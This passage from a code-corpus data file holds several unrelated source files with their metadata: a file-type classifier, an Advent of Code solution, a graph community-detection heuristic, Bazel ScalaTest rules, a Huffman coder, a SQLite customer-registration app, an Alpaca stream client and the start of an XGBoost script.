self).run_injection_command(cmd)\n\n def run(self):\n \"\"\"\n It injects the traffic given the attributes of this class, and store\n the statistics as an L{InjectorStats} parameter\n\n @return: The return code of the injector, indicating success (zero) or \n failure (non-zero).\n @rtype: int\n \"\"\"\n try:\n self._setup_sasn_env()\n self._restart_injector_module()\n\n self._inject_traffic()\n\n self._wait_until_injection_finished()\n self.logger.debug(\"Traffic injection finished\")\n except:\n etype, value, traceb = sys.exc_info()\n error_exception_lines = traceback.format_exception(etype, value, traceb)\n logging.getLogger(\"NSTlogger\").exception(error_exception_lines)\n \n finally:\n self._free_resources()\n\n def get_protocol_marks(self):\n SHOW_DETECTION_IDS_CMD = 'ns part set 1; ns config injector show detection-ids'\n\n ret_code, stdout, stderr = self.run_injection_command(SHOW_DETECTION_IDS_CMD)\n assert ret_code == 0 and stdout != 'no injector loaded', \\\n \"Command: '%s' returned (%d, %s, %s)\" % (SHOW_DETECTION_IDS_CMD,\n ret_code, stdout, stderr)\n \n detection_ids = {}\n for l in stdout:\n try:\n mark, proto_label = l.split(':')\n detection_ids[mark] = proto_label\n except ValueError:\n break\n\n return detection_ids\n","sub_path":"sds/back_test/ref/nsInjector.py","file_name":"nsInjector.py","file_ext":"py","file_size_in_byte":7807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"561716043","text":"from itertools import groupby\ndef is_sql(line):\n key = \" \".join(line.split()[:2])\n if key in [\"INSERT INTO\", \"CREATE TABLE\"]:\n return True\n return False\n\ndef csv_potential(line, char):\n return (len(line.split(char)), 1)\n\n\ndef move_to_folder(file):\n #return types:\n #0 - sql\n #1 - csv/tsv\n #2 - hash\n #3 - space delimited/ambiguous\n #4 - unstructured/dox\n f0 = open(file, \"r\")\n n_lines = 0\n delim = [\",\", \":\", \"\\t\", \" \"]\n d_csv = {}\n for d in delim:\n d_csv[d] = []\n try:\n for line in f0:\n if is_sql(line):\n return 0 #0 type = sql\n for d in delim:\n d_csv[d].append(csv_potential(line, d))\n n_lines += 1\n if n_lines == 150:\n break\n\n\n for k, v in d_csv.iteritems():\n m_v = list(max(groupby(v)))[0]\n if float(len(filter(lambda x: x==m_v, v)))/len(v) > .8:\n if k == \",\" or k == \"\\t\":\n return 1\n elif k == \":\" and m_v == 2:\n return 2\n elif k == \":\":\n return 1\n elif k == \" \":\n return 3\n\n return 4\n except:\n print(\"File:\", file)\n print(\"Unexpected error:\", sys.exc_info()[0])\n print(\"Line:\", line)\n return -1","sub_path":"file_type_assign.py","file_name":"file_type_assign.py","file_ext":"py","file_size_in_byte":1361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"649705193","text":"#! /usr/bin/env python3\n\nfrom pathlib import Path\nfrom itertools import takewhile\nfrom collections import Counter\n\ndef parse(coord_list):\n coordinates = [[int(coord) for coord in coord_pair.split(', ')]\n for coord_pair in coord_list]\n return coordinates\n\ndef coord_bounds(coordinates):\n x_coords, y_coords = zip(*coordinates)\n\n xmin = min(x_coords)\n xmax = max(x_coords)\n ymin = min(y_coords)\n ymax = max(y_coords)\n\n return xmin, xmax, ymin, ymax\n\ndef L1_dist(p1, p2):\n x1, y1 = p1\n x2, y2 = p2\n return abs(x1-x2) + abs(y1-y2)\n\ndef part1(coordinates):\n\n xmin, xmax, ymin, ymax = coord_bounds(coordinates)\n atlas = {}\n\n for x in range(xmin, xmax+1):\n for y in range(ymin, ymax+1):\n # sort and iterate only over as many as share the minimum distance\n npoint_dists = sorted(((n, L1_dist((x,y), coord))\n for (n, coord) in enumerate(coordinates)),\n key=lambda x: x[1])\n closest = [*takewhile(lambda x: x[1] == npoint_dists[0][1], npoint_dists)]\n if len(closest) > 1:\n continue\n atlas[x, y] = closest[0][0]\n\n edges = {n for ((x, y), n) in atlas.items()\n if x in {xmin, xmax} or y in {ymin, ymax}}\n areas = Counter(n for n in atlas.values() if n not in edges)\n return areas.most_common(1)[0][1]\n\ndef part2(coordinates, max_tot_dist):\n\n xmin, xmax, ymin, ymax = coord_bounds(coordinates)\n atlas = {}\n\n for x in range(xmin, xmax+1):\n for y in range(ymin, ymax+1):\n dist = sum((L1_dist((x,y), coord)\n for coord in coordinates))\n if dist >= max_tot_dist:\n continue\n atlas[x, y] = 1\n return sum(atlas.values())\n\nif __name__ == '__main__':\n\n with open(str(Path('../data/06.dat')), 'r') as f:\n coordinates = parse(f)\n\n print(part1(coordinates))\n\n print(part2(coordinates, max_tot_dist=10000))\n","sub_path":"src/06.py","file_name":"06.py","file_ext":"py","file_size_in_byte":2011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"245231499","text":"# encoding: utf-8\n\nimport LoadData as ld\nimport random as rd\nimport Send_QQ_Msg as sq\nimport time\nimport profile\n\n\nclass MulstReloc:\n def __init__(self, path, t_limit=0, scale=0):\n \"\"\"\n t_limit:时间限制or迭代次数限制\n path:数据集路径\n scale:社区的数量\n solution:当前问题对应的向量形式的解\n best_solution:当前的最优解\n \"\"\"\n self.t_limit = t_limit\n self.dataset = ld.load_data(path)\n self.scale = scale\n self.solution = [0] * (self.dataset.vnum + 1)\n self.best_solution = [0] * (self.dataset.vnum + 1)\n self.best_pt = []\n\n # 生成初始解\n def init_solution(self):\n # t_i1 = time.time()\n k_max = self.dataset.vnum\n vertex_set = list(range(1, k_max + 1))\n core = []\n i = 0\n # 初始选择 K 个不同的结点\n while True:\n t = rd.randint(1, k_max)\n if t not in core:\n core.append(t)\n self.solution[t] = i\n vertex_set.remove(t)\n i += 1\n if len(core) == self.scale:\n break\n # 剩余 n-K 个结点的处理\n for v in vertex_set:\n score = []\n for c in core:\n c_score = self.neighborhood_similarity_v2(v, c)\n score.append(c_score)\n max_score = max(score)\n max_score_list = []\n for i in range(self.scale):\n if score[i] == max_score:\n max_score_list.append(i)\n # 邻居相似性相同时则随机划分到某一个结点中\n res = max_score_list[rd.randint(0, len(max_score_list) - 1)]\n self.solution[v] = res\n # t_i2 = time.time()\n # print('生成初始解用时:', t_i2 - t_i1)\n print('初始解已生成')\n\n # 邻居相似性\n def neighborhood_similarity_v2(self, x, y):\n neighbor_x = self.get_neighbor(x)\n neighbor_y = self.get_neighbor(y)\n return len(neighbor_x & neighbor_y)\n\n # 找到结点x的所有邻居结点\n def get_neighbor(self, x):\n neighbor = set()\n idx = self.dataset.st_index\n idy = self.dataset.ed_index\n if idx[x] != -1:\n for xn in self.dataset.data[idx[x]:]:\n if xn[0] != x:\n break\n if xn[2] == 1:\n neighbor.add(xn[1])\n elif xn[2] == -1:\n neighbor.add(xn[1] * (-1))\n if idy[x] != -1:\n for yn in self.dataset.data_rev[idy[x]:]:\n if yn[1] != x:\n break\n # print(yn)\n if yn[2] == 1:\n neighbor.add(yn[0])\n elif yn[2] == -1:\n neighbor.add(yn[0] * (-1))\n return neighbor\n\n def z_function(self, array_solution):\n # 同一社区中的负边数 + 不同社区中的正边数\n z = 0\n pt = array_solution\n for each in self.dataset.data:\n # 一条边的两点属于同一社区\n if pt[each[0]] == pt[each[1]] and each[2] == -1:\n # 如果这条边是负边\n z += 1\n elif pt[each[0]] != pt[each[1]] and each[2] == 1:\n z += 1\n return z\n\n def delta_z(self, i, c):\n # 针对当前解,只变动结点i,将其移动至社区c,计算目标函数的变化\n sl = self.solution\n h = sl[i]\n div = 0\n # 得到其邻接点集\n ns = self.get_neighbor(i)\n for each in ns:\n # 意味着两点之间以负边相连,只有不同社区间的负边才会计入z_function\n if each < 0:\n # 移动前不在同一社区,移动后在同一社区,目标函数减少\n if sl[-each] != h and sl[-each] == c:\n div -= 1\n elif sl[-each] == h and sl[-each] != c:\n div += 1\n # 两点间以正边相连\n else:\n if sl[each] != h and sl[each] == c:\n div += 1\n elif sl[each] == h and sl[each] != c:\n div -= 1\n return -div\n\n # 将向量形式的解转化为集合形式\n def solu2pt(self):\n pt = []\n for i in range(self.scale):\n pt.append([])\n sl = self.solution\n for i in range(1, self.dataset.vnum+1):\n pt[sl[i]].append(i)\n return pt\n\n # 算法流程\n def run(self):\n # 产生初始划分\n self.init_solution()\n vnum = self.dataset.vnum\n scale = self.scale\n sl = self.solution\n improv = 0\n ct = 0\n while improv == 0:\n improv = 1\n ct += 1\n for i in range(vnum):\n # print('正在处理的结点号为', i)\n # 给所有社区一个标号,作为结点移动的记录集\n communities = list(range(scale))\n # 找到当前结点所属的社区,标号为h\n h = sl[i]\n # print('其所属社区为', h)\n communities.remove(h)\n if sl.count(h) > 1:\n # 尝试移动到其它所有社区\n for each in communities:\n # print('预计将其放入的社区为', each)\n # 将点i从当前社区移除\n # 将点i加入其它任一社区\n # 用delta对移动的效果进行评估\n delta = self.delta_z(i, each)\n # 若发生移动之后目标函数更优,则修改当前解,并结束当前结点的剩余尝试\n if delta < 0:\n # print('====================解得到更新!!!==========================')\n sl[i] = each\n improv = 0\n break\n # 否则,什么都不做\n # print('子循环重试到了第', ct, '次')\n # print('本轮迭代结束后的划分为:')\n # print('对应的最优值为:', self.z_function(self.solution))\n # print('为得到局部最优解,循环进行了%d次' % ct)\n\n def iter_run(self):\n i = 0\n while i < self.t_limit:\n self.run()\n if i == 0:\n self.best_solution = self.solution.copy()\n if self.z_function(self.solution) < self.z_function(self.best_solution):\n self.best_solution = self.solution.copy()\n i += 1\n print('目前的最优值为:', self.z_function(self.best_solution))\n self.best_pt = self.solu2pt()\n # print(self.best_pt)\n\n\nif __name__ == '__main__':\n file_path = r'D:\\python_files\\src\\Instances\\Social Media\\slashdot-undirected\\part0'\n file_name = r'slashdot-undirected-size2000-part0.g'\n data_path = file_path + r'\\\\' + file_name\n time_st = time.time()\n mr = MulstReloc(data_path, 1000, scale=3)\n # profile.run('mr.iter_run()')\n mr.iter_run()\n time_ed = time.time()\n total_time = time_ed - time_st\n print('total time:', total_time)\n msg = '你的程序跑完了,用时:' + str(total_time)\n sq.send_msg(msg)\n # a0 = mr.init_solution()\n # print(a0)\n","sub_path":"algorithm/Multistart_Relocation.py","file_name":"Multistart_Relocation.py","file_ext":"py","file_size_in_byte":7433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"366094852","text":"\"\"\"Rules for writing tests with ScalaTest\"\"\"\n\nload(\n \"@io_bazel_rules_scala//scala/private:common_attributes.bzl\",\n \"common_attrs\",\n \"implicit_deps\",\n \"launcher_template\",\n)\nload(\"@io_bazel_rules_scala//scala/private:common.bzl\", \"sanitize_string_for_usage\")\nload(\"@io_bazel_rules_scala//scala/private:common_outputs.bzl\", \"common_outputs\")\nload(\n \"@io_bazel_rules_scala//scala/private:coverage_replacements_provider.bzl\",\n _coverage_replacements_provider = \"coverage_replacements_provider\",\n)\nload(\n \"@io_bazel_rules_scala//scala/private:rule_impls.bzl\",\n \"collect_jars_from_common_ctx\",\n \"declare_executable\",\n \"expand_location\",\n \"first_non_empty\",\n \"get_scalac_provider\",\n \"get_unused_dependency_checker_mode\",\n \"scala_binary_common\",\n \"write_executable\",\n \"write_java_wrapper\",\n)\n\ndef _scala_test_flags(ctx):\n # output report test duration\n flags = \"-oD\"\n if ctx.attr.full_stacktraces:\n flags += \"F\"\n else:\n flags += \"S\"\n if not ctx.attr.colors:\n flags += \"W\"\n return flags\n\ndef _scala_test_impl(ctx):\n scalac_provider = get_scalac_provider(ctx)\n\n unused_dependency_checker_mode = get_unused_dependency_checker_mode(ctx)\n unused_dependency_checker_ignored_targets = [\n target.label\n for target in scalac_provider.default_classpath +\n ctx.attr.unused_dependency_checker_ignored_targets\n ]\n unused_dependency_checker_is_off = unused_dependency_checker_mode == \"off\"\n\n scalatest_base_classpath = scalac_provider.default_classpath + [ctx.attr._scalatest]\n jars = collect_jars_from_common_ctx(\n ctx,\n scalatest_base_classpath,\n extra_runtime_deps = [\n ctx.attr._scalatest_reporter,\n ctx.attr._scalatest_runner,\n ],\n unused_dependency_checker_is_off = unused_dependency_checker_is_off,\n )\n (\n cjars,\n transitive_rjars,\n transitive_compile_jars,\n jars_to_labels,\n ) = (\n jars.compile_jars,\n jars.transitive_runtime_jars,\n jars.transitive_compile_jars,\n jars.jars2labels,\n )\n\n args = \"\\n\".join([\n \"-R\",\n ctx.outputs.jar.short_path,\n _scala_test_flags(ctx),\n \"-C\",\n \"io.bazel.rules.scala.JUnitXmlReporter\",\n ])\n\n argsFile = ctx.actions.declare_file(\"%s.args\" % ctx.label.name)\n ctx.actions.write(argsFile, args)\n\n executable = declare_executable(ctx)\n\n wrapper = write_java_wrapper(ctx, \"\", \"\")\n out = scala_binary_common(\n ctx,\n executable,\n cjars,\n transitive_rjars,\n transitive_compile_jars,\n jars_to_labels,\n wrapper,\n unused_dependency_checker_ignored_targets =\n unused_dependency_checker_ignored_targets,\n unused_dependency_checker_mode = unused_dependency_checker_mode,\n runfiles_ext = [argsFile],\n deps_providers = jars.deps_providers,\n )\n\n rjars = out.transitive_rjars\n\n coverage_runfiles = []\n if ctx.configuration.coverage_enabled and _coverage_replacements_provider.is_enabled(ctx):\n coverage_replacements = _coverage_replacements_provider.from_ctx(\n ctx,\n base = out.coverage.replacements,\n ).replacements\n\n rjars = depset([\n coverage_replacements[jar] if jar in coverage_replacements else jar\n for jar in rjars.to_list()\n ])\n coverage_runfiles = ctx.files._jacocorunner + ctx.files._lcov_merger + coverage_replacements.values()\n\n # jvm_flags passed in on the target override scala_test_jvm_flags passed in on the\n # toolchain\n final_jvm_flags = first_non_empty(\n ctx.attr.jvm_flags,\n ctx.toolchains[\"@io_bazel_rules_scala//scala:toolchain_type\"].scala_test_jvm_flags,\n )\n\n coverage_runfiles.extend(write_executable(\n ctx = ctx,\n executable = executable,\n jvm_flags = [\n \"-DRULES_SCALA_MAIN_WS_NAME=%s\" % ctx.workspace_name,\n \"-DRULES_SCALA_ARGS_FILE=%s\" % argsFile.short_path,\n ] + expand_location(ctx, final_jvm_flags),\n main_class = ctx.attr.main_class,\n rjars = rjars,\n use_jacoco = ctx.configuration.coverage_enabled,\n wrapper = wrapper,\n ))\n\n return struct(\n executable = executable,\n files = out.files,\n instrumented_files = out.instrumented_files,\n providers = out.providers,\n runfiles = ctx.runfiles(coverage_runfiles, transitive_files = out.runfiles.files),\n scala = out.scala,\n )\n\n_scala_test_attrs = {\n \"main_class\": attr.string(\n default = \"io.bazel.rulesscala.scala_test.Runner\",\n ),\n \"colors\": attr.bool(default = True),\n \"full_stacktraces\": attr.bool(default = True),\n \"jvm_flags\": attr.string_list(),\n \"_scalatest\": attr.label(\n default = Label(\n \"//external:io_bazel_rules_scala/dependency/scalatest/scalatest\",\n ),\n ),\n \"_scalatest_runner\": attr.label(\n cfg = \"host\",\n default = Label(\"//src/java/io/bazel/rulesscala/scala_test:runner\"),\n ),\n \"_scalatest_reporter\": attr.label(\n default = Label(\"//scala/support:test_reporter\"),\n ),\n \"_jacocorunner\": attr.label(\n default = Label(\"@bazel_tools//tools/jdk:JacocoCoverage\"),\n ),\n \"_lcov_merger\": attr.label(\n default = Label(\"@bazel_tools//tools/test/CoverageOutputGenerator/java/com/google/devtools/coverageoutputgenerator:Main\"),\n ),\n}\n\n_test_resolve_deps = {\n \"_scala_toolchain\": attr.label_list(\n default = [\n Label(\n \"//external:io_bazel_rules_scala/dependency/scala/scala_library\",\n ),\n Label(\n \"//external:io_bazel_rules_scala/dependency/scalatest/scalatest\",\n ),\n ],\n allow_files = False,\n ),\n}\n\n_scala_test_attrs.update(launcher_template)\n\n_scala_test_attrs.update(implicit_deps)\n\n_scala_test_attrs.update(common_attrs)\n\n_scala_test_attrs.update(_test_resolve_deps)\n\nscala_test = rule(\n attrs = _scala_test_attrs,\n executable = True,\n fragments = [\"java\"],\n outputs = common_outputs,\n test = True,\n toolchains = [\"@io_bazel_rules_scala//scala:toolchain_type\"],\n implementation = _scala_test_impl,\n)\n\n# This auto-generates a test suite based on the passed set of targets\n# we will add a root test_suite with the name of the passed name\ndef scala_test_suite(\n name,\n srcs = [],\n visibility = None,\n use_short_names = False,\n **kwargs):\n ts = []\n i = 0\n for test_file in srcs:\n i = i + 1\n n = (\"%s_%s\" % (name, i)) if use_short_names else (\"%s_test_suite_%s\" % (name, sanitize_string_for_usage(test_file)))\n scala_test(\n name = n,\n srcs = [test_file],\n visibility = visibility,\n unused_dependency_checker_mode = \"off\",\n **kwargs\n )\n ts.append(n)\n native.test_suite(name = name, tests = ts, visibility = visibility)\n","sub_path":"scala/private/rules/scala_test.bzl","file_name":"scala_test.bzl","file_ext":"bzl","file_size_in_byte":7029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"1427233","text":"from priorityqueue import *\nfrom stack import *\n'''\nJust the steps interpreted from the code doc\n1. Huffman takes a string called X with length N and D distinct characters\n2. Compute the frequency for each character C in X\n3. Make a priority Queue, Q\n4.for each character c, make a single node binary tree storing c with\ndetail about its frequency\n\n5. Use the Queue to dequeue and start left and right subtree, then insert new tree into Q with combined frequency\n6. Finally, dequeue the last item (which should be the entire huffman encoded tree)\n7. Return Tree\n'''\nclass Node:\n def __init__(self,freq,char,left,right):\n self.freq = freq\n self.char = char\n self.left = left\n self.right = right\n def __repr__(self):\n return str((self.char, self.freq))\n def __iter__(self):\n if self.left != None:\n for elem in self.left:\n yield elem \n yield self.char\n if self.right != None:\n for elem in self.right:\n yield elem \n def isLeaf(self):\n if self.left == None and self.right == None:\n return True\n return False\n def twochildren(self):\n if self.left and self.right:\n return True\n return False\n def leftonly(self):\n if self.left and not self.right:\n return True\n return False\n def rightonly(self):\n if self.right and not self.left:\n return True\n return False\n#this will take a string X of length n with d distinct characters\n#and will return the huffman coding tree for X\n'''=== Higher frequency characters have lower priority==='''\ndef huffman(X):\n \n Q = PriorityQueue()\n \n f = freq(X) #This is a dictionary\n c_sorted = sorted(f.items(), key=lambda x:ord(x[0]),reverse = True)\n \n for c in c_sorted:\n T = Node(c[1],c[0],None,None)\n Q.enqueue(T, 100-c[1])\n \n \n while len(Q) > 1:\n \n T1 = Q.dequeue()\n \n T2 = Q.dequeue()\n \n T = Node(T1.freq + T2.freq, str(T1.freq + T2.freq), T1, T2)\n pri = T1.freq + T2.freq\n \n Q.enqueue(T, 100-(pri))\n T = Q.dequeue()\n \n return T\ndef freq(c):\n dict = {}\n for n in c:\n keys = dict.keys()\n if n in keys:\n dict[n] +=1\n else:\n dict[n] = 1\n return dict\n\n''' If you traverse left, \"0\", if you traverse right\n\"1\" get the code when you reach the character and return that code number (or probably the\nthe code numbers in a list\n'''\n\n\ndef preorder(tree):\n root = tree\n b = []\n c = []\n a = []\n if not root:\n return\n if root.isLeaf():\n a = [root.char]\n if root.left:\n b = preorder(root.left)\n if root.right:\n c = preorder(root.right)\n return a + b + c\ndef findChar(ch,root):\n nodeS = Stack()\n moves = Stack()\n visited = []\n code = []\n nodeS.push(root)\n current_node = nodeS.top()\n while nodeS:\n if current_node.left and current_node.left not in visited:\n nodeS.push(current_node.left)\n visited.append(current_node.left)\n moves.push('L')\n current_node = nodeS.top()\n else:\n if current_node.right and current_node.right not in visited:\n nodeS.push(current_node.right)\n visited.append(current_node.right)\n moves.push('R')\n current_node = nodeS.top()\n if current_node.right in visited:\n moves.pop()\n nodeS.pop()\n current_node = nodeS.top()\n if current_node.isLeaf() and current_node.char != ch:\n moves.pop()\n nodeS.pop()\n current_node = nodeS.top()\n if current_node.isLeaf() and current_node.char == ch:\n while not moves.isEmpty():\n code.append(moves.pop())\n break\n \n return code[::-1]\ndef code_helper(code):\n cd = ''\n for i in code:\n if i == 'L':\n cd = cd + '0'\n else:\n cd = cd + '1'\n return cd\n \ndef get_huffman_code(ch,root):\n b = findChar(ch,root)\n return code_helper(b)\n\n\n#Helper function for Huffman that will count the frequency of characters \n#i.e apple, p shows up twice, break ties for characters that have the same frequency by checking ASCII codes\n\n \n \n\ndef main():\n pass\n \n \nif __name__ == '__main__':\n main()\n","sub_path":"huffman.py","file_name":"huffman.py","file_ext":"py","file_size_in_byte":4477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"224906358","text":"#!/usr/bin/python3\n#-*-coding:utf8;-*-\n\n'''\n| CADASTRO DE CLIENTES |\n\n[Github] https://github.com/MartinsMessias\n'''\n\n# Módulos necessários\nfrom cores import Azul, CorNull, INBlue, INRed, URed, FAIWhite\nimport sqlite3\nfrom os import system\nfrom time import sleep\n\n# Diminuindo tamanho dos nomes das cores\n\nAz = Azul # Az\nRe = URed # Vermelho sublinhado\nCN = CorNull # Tirar cor\nINB = INBlue # Az intenso negrito\nINR = INRed # Vermelho intenso negrito\nFDb = FAIWhite # Fundo branco\n\n# Conectando-se ao banco de dados...\nconn = sqlite3.connect(':memory:') # Use 'clientes.db' caso queira dados persistentes\n\n# Definindo cursor...\ncursor = conn.cursor()\n\n# Criando tabela se ainda não existe\ncursor.execute(\"\"\"\n CREATE TABLE IF NOT EXISTS clientes (\n id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,\n nome VARCHAR NOT NULL,\n cpf VARCHAR(14) NOT NULL,\n telefone varchar(20));\"\"\")\n\n\n# Funções do programa\ndef funcoesOp(opcao):\n if opcao == 1:\n nome = str(input('{}\\n[ NOME ]: {}'.format(INR, CN))).strip()\n cpf = str(input('{}\\n[ CPF ]: {}'.format(INR, CN))).strip()\n telefone = str(input('{}\\n[ TEL ]: {}'.format(INR, CN))).strip()\n\n # Inserindo dados na tabela\n\n info = [(nome, cpf, telefone)]\n\n cursor.executemany(\"\"\"\n INSERT INTO clientes (nome, cpf, telefone)\n VALUES (?,?,?)\"\"\", info)\n conn.commit()\n\n print('\\n{}[ DADOS INSERIDOS COM SUCESSO ]{}'.format(INR, CN))\n\n retornaMenu()\n\n elif opcao == 2:\n if verificaDB() == True:\n alteraInfo()\n retornaMenu()\n\n elif opcao == 3:\n if verificaDB() == True:\n cpf = input('{}\\nDigite o CPF: {}'.format(INR, CN)).strip()\n consultaInfo(cpf)\n retornaMenu()\n\n elif opcao == 4:\n if verificaDB() == True:\n cursor.execute(\"\"\"SELECT * FROM clientes;\"\"\")\n ordenaLista(cursor.fetchall())\n retornaMenu()\n\n elif opcao == 5:\n if verificaDB() == True:\n excluiCli()\n\n elif opcao == 0:\n print('\\n{}Saíndo...{}'.format(INR, CN))\n\n # Fechando conexão com banco de dados\n conn.close()\n exit()\n\n else:\n menuPrincipal()\n\n\ndef menuPrincipal():\n # Menu principal\n\n system('clear')\n\n print(INB, 10 * '=', '|- : ', INR, 'MENU PRINCIPAL', CN, INB, ' : -|', 10 * '=', '\\n', CN, Az,\n '''\n\n [1] - Adicionar novo\n [2] - Alterar informações\n [3] - Cosultar informações\n [4] - Consultar todos\n [5] - Excluir\n [0] - Sair\n \n''', INB, 44 * '=', CN, '\\n')\n\n opcao = int(input('{}[OPÇÃO]: {}'.format(INR, CN)))\n funcoesOp(opcao)\n\n\ndef retornaMenu():\n op = str(input('\\n\\t{2}[ OPÇÕES ]\\n\\n\\t'\n '{0}ALTERAR INFOMAÇÕES{1} {2}[1]\\n\\t'\n '{0}EXCLUIR CADASTRO{1} {2}[2]\\n\\n\\t'\n '{0}Para voltar ao menu pressione {2}[ENTER]\\n\\t--: {1}'.format(INB, CN, INR))).strip()\n system('clear')\n\n if op == '1': alteraInfo()\n if op == '2':\n excluiCli()\n else:\n menuPrincipal()\n\n\ndef ordenaLista(line):\n print('\\n' + INB + 3 * '=' + INR + '[ LISTA DE CADASTROS ]' + INB + 15 * '=' + CN + '\\n')\n\n for linha in line:\n sleep(0.3)\n id, nome, cpf, telefone = linha\n\n print(44 * '{}_{}'.format(Re, CN))\n print(INR, ' [ ID ]-', Az, '-[', id, ']')\n print(INR, ' [ NOME ]-', INB, '-[', nome)\n print(INR, ' [ CPF ]-', INB, '-[', cpf, )\n print(INR, ' [ TEL ]-', INB, '-[', telefone, CN)\n print(44 * '{}_{}'.format(Re, CN))\n\n\ndef consultaInfo(cpf):\n info = [(cpf)]\n\n # Lendo os dados do banco de dados\n cursor.execute(\"\"\"\n SELECT * FROM clientes\n WHERE cpf = ?\"\"\", info)\n conn.commit()\n\n ordenaLista(cursor.fetchall())\n\n\ndef alteraInfo():\n cpf = input('{}\\nDigite o CPF: {}'.format(INR, CN)).strip()\n consultaInfo(cpf)\n\n print(INR, '''\\n\n [Nome ][1]\n [CPF ][2]\n [Telefone][3]\n\n Escolha uma ou mais opções pelo número\n \\n''', CN)\n\n info = str(input('{}[OPÇÃO]: {}'.format(INR, CN))).strip()\n info = list(info)\n\n if '1' in info:\n nome = str(input('\\n{}[Novo nome]:{} '.format(INB, CN))).strip()\n cursor.execute(\"\"\"UPDATE clientes SET nome = ? WHERE cpf = ?\"\"\", (nome, cpf))\n conn.commit()\n\n if '2' in info:\n cpfnovo = str(input('\\n{}[Novo CPF]:{} '.format(INB, CN))).strip()\n cursor.execute(\"\"\"UPDATE clientes SET cpf = ? WHERE cpf = ?\"\"\", (cpfnovo, cpf))\n conn.commit()\n cpf = cpfnovo\n\n if '3' in info:\n telefone = str(input('\\n{}[Novo telefone]:{} '.format(INB, CN))).strip()\n cursor.execute(\"\"\"UPDATE clientes SET telefone = ? WHERE cpf = ?\"\"\", (telefone, cpf))\n conn.commit()\n\n consultaInfo(cpf)\n print(INR, '\\n[ ATUALIZADO COM SUCESSO ]', CN)\n\n\ndef excluiCli():\n cpf = input('{}\\nDigite o CPF: {}'.format(INR, CN)).strip()\n consultaInfo(cpf)\n\n id = input('{}\\nDigite o ID do cliente a ser excluido: {}'.format(INR, CN)).strip()\n test = input('{}\\nTens certeza que deseja excluir? (S/n): {}'.format(INR, CN)).strip().lower()\n\n if test == 's':\n # excluindo um registro da tabela\n cursor.execute(\"\"\"DELETE FROM clientes WHERE id = ?\"\"\", (id))\n conn.commit()\n\n print('\\n{}[ REMOVIDO COM SUCESSO ]{}'.format(INR, CN))\n\n retornaMenu()\n\n\ndef verificaDB():\n cursor.execute(\"\"\"SELECT id FROM clientes;\"\"\")\n lista = cursor.fetchall()\n\n i = 0\n for linha in lista:\n i += 1\n if i <= 0:\n print('\\n{}[ BANCO DE DADOS VÁZIO ]{}'.format(INR, CN))\n input('Para voltar ao menu pressione {0}[ENTER]{1}'.format(INB, CN))\n menuPrincipal()\n return True\n\n\ntry:\n menuPrincipal()\nexcept ValueError:\n print(INR, 'Deve digitar o nº correspondente a opção desejada e em seguida tecle [ENTER]!!!', CN)\n sleep(3)\n menuPrincipal()\n\n# Fechando conexão com banco de dados\nconn.close()\n","sub_path":"Algoritmos 2/CadastroDeClientes/sistema.py","file_name":"sistema.py","file_ext":"py","file_size_in_byte":6161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"42019478","text":"'''SETS/'''\r\nset1 = set()\r\nset1size = int(input(\"Enter the size of first set: \"))\r\nfor i in range(0 , set1size):\r\n set1Item = int(input())\r\n set1.add(set1Item)\r\nset2 = set()\r\nset2size = int(input(\"Enter the size of second set: \"))\r\nfor i in range(0 , set2size):\r\n set2Item = int(input())\r\n set2.add(set2Item)\r\nprint(set1)\r\nprint(set2)\r\n\r\n'''1'''\r\ndiffset = set1 - set2\r\nprint(diffset)\r\ndiffset = set2 - set1\r\nprint(diffset)\r\n\r\n'''2'''\r\nissubset = set1 <= set2\r\nif issubset == True:\r\n print(\"First set is subset of Second set\")\r\nelse:\r\n print(\"First set is not a subset of Second set\")\r\nissubset = set2 <= set1\r\nif issubset == True:\r\n print(\"Second set is subset of First set\")\r\nelse:\r\n print(\"Second set is not a subset of First set\")\r\nissuperset = set2 >= set1\r\nif issuperset == True:\r\n print(\"Second set is superset of First set\")\r\nelse:\r\n print(\"Second set is not a superset of First set\")\r\nissuperset = set1 >= set2\r\nif issuperset == True:\r\n print(\"First set is superset of Second set\")\r\nelse:\r\n print(\"First set is not a superset of Second set\")\r\n\r\n'''3'''\r\nintersection = set1 & set2\r\nprint(\"The intersection of both sets:\" , intersection)","sub_path":"Sets.py","file_name":"Sets.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"378834349","text":"from alpaca_trade_api import Stream\n\nimport logging\nlogging.basicConfig(format='%(asctime)s %(levelname)5s %(module)s %(message)s',datefmt='%Y%m%d.%H:%M:%S',level=logging.DEBUG)\n\nsymbol = 'GOOG'\n\nstream = Stream()\n\nasync def quote_handler(quote): print('%s' % quote)\nasync def trade_handler(trade): print('%s' % trade)\nstream.subscribe_quotes(quote_handler,symbol)\nstream.subscribe_trades(trade_handler,symbol)\n\nasync def execution_handler(execution): print('%s' % execution)\nstream.subscribe_trade_updates(execution_handler)\n\nstream.run()\n","sub_path":"examples/exchanges/alpaca_ws.py","file_name":"alpaca_ws.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"351632913","text":"import gc\nimport pandas as pd\nimport xgboost\nimport pickle\nimport numpy as np\nfrom datetime import datetime\nfrom matplotlib import pylab as plt\nimport operator\n#from sklearn.model_selection import train_test_split\n\n\nif __name__ == '__main__': \n t1 = datetime.now()\n print(\"Read data ... \" )\n \n r_f = pd.read_csv(\"data/f_feature.csv\")\n\n data = pd.read_pickle('data/data.pkl')\n \n train_all = pd.merge(data, r_f, on=['user_id', 'product_id'])\n \n del r_f\n del data\n gc.collect()\n \n train = train_all.sample(n=2400000)\n \n labels = train[['reordered']].values.astype(np.float32).flatten()\n train.drop(['product_id','order_id', 'user_id','reordered'], axis=1, inplace=True)\n\n \n del train_all\n gc.collect()\n \n print(\"Sample data ... \" )\n 